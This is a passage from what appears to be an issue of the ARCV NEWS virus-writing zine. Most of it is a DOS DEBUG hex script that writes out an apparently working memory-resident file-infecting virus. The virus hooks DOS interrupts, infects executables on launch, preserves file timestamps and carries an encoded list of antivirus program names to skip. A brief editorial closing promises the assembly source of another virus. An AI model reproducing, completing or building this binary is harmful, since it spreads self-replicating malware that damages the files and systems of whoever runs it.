58 07 1F 9C 2E FF 1E 17 00 1E e 02F0 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04 e 0300 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00 e 0310 75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02 e 0320 8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07 e 0330 1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0 e 0340 61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF e 0350 75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75 e 0360 03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E e 0370 A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E e 0380 FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00 e 0390 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52 e 03A0 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A e 03B0 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03 e 03C0 F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16 e 03D0 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00 e 03E0 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C e 03F0 20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84 e 0400 00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06 e 0410 56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26 e 0420 8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56 e 0430 06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80 e 0440 3D FF 74 2B 47 2E 8B 36 57 06 2E C6 06 56 06 00 e 0450 90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43 e 0460 CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8 e 0470 00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E e 0480 A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D e 0490 74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D e 04A0 CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF e 04B0 BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05 e 04C0 00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA e 04D0 BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4 e 04E0 42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E e 04F0 EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01 e 0500 B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02 e 0510 B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21 e 0520 72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00 e 0530 FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E e 0540 D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00 e 0550 89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80 e 0560 3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD e 0570 21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06 e 0580 8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B e 0590 0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03 e 05A0 F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00 e 05B0 1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D e 05C0 E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7 e 05D0 06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43 e 05E0 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00 e 05F0 83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00 e 0600 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89 e 0610 16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B e 0620 D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16 e 0630 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63 e 0640 00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1 e 0650 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD e 0660 21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8 e 0670 00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9 e 0680 05 00 8D 16 05 00 B4 40 CD 21 2E 83 3E 8F 00 00 e 0690 74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B e 06A0 1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57 e 06B0 CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72 e 06C0 00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07 e 06D0 1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA e 06E0 00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5 e 06F0 44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8 e 0700 F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE e 0710 BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE e 0720 E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9 e 0730 FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3 e 0740 FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2 e 0750 F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00 e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0770 00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28 e 0780 8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15 e 0790 24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00 e 07A0 44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00 e 07B0 C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02 e 07C0 4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A rcx 7CF w q --------------------------------------------------------------------------- ARCV NEWS 006. Closing. Well that it for this time the mag in future will be a Bi-Monthly affair and I now offer out to you all to send in any articile for inclusion in future issues. Well I'm not sure what will be in next month but we should have the Asm source for Commander Bomber Virus and much more.